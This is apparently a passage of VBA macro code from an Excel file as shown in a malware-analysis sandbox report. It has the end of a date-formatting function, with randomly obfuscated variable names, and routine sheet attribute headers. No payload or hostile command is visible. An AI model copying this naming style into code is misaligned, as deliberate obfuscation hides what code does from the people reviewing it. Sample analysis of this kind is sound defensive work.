        ":" & Right(gETXNJmVtLZpiBaFSSQnWkeUHdvjdESHEDSNpHmNkvfTPV, 2)
    tDate = yMCKinzZrZTraEySaXYULWxTpdLJdKQnEAWzCRFZqvVZaP & "-" & Right(LpiCPZdgpiAPYAHHmYxPikteGxzhkPecRNetaGvmjAcCSf, 2) & "-" & Right(AvwhtGLmKyavxqrgQgTuLuQwQtxNqVByCZzRFnLNpCHhdP, 2)
    XmlTime = tDate & "T" & tTime
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.